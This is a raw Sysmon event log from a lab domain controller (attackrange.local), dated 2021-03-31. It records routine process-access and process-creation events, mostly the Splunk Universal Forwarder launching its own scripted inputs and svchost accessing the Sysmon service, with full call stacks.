12:02:58.731{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.731{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.731{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.731{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-0001-00000000AE01}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.731{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-0001-00000000AE01}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.733{266CAFBE-64F2-6064-0001-00000000AE01}3448C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.622{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FF00-00000000AE01}6756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.622{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.622{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.622{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.622{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.622{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FF00-00000000AE01}6756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.622{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FF00-00000000AE01}6756C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.623{266CAFBE-64F2-6064-FF00-00000000AE01}6756C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.512{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FE00-00000000AE01}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.512{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.512{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.512{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.512{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.512{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FE00-00000000AE01}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.512{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FE00-00000000AE01}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.514{266CAFBE-64F2-6064-FE00-00000000AE01}7008C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.403{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FD00-00000000AE01}6844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.403{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
